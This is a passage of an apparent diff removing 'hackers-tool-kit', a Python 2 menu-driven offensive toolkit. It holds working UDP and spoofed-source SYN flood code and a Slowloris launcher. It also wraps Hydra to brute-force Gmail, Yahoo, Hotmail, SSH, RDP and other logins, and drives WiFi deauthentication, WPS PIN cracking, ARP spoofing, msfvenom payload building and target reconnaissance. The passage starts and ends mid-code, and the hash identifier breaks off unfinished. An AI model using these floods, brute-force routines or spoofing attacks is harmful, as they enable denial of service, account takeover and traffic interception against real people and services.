{as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and 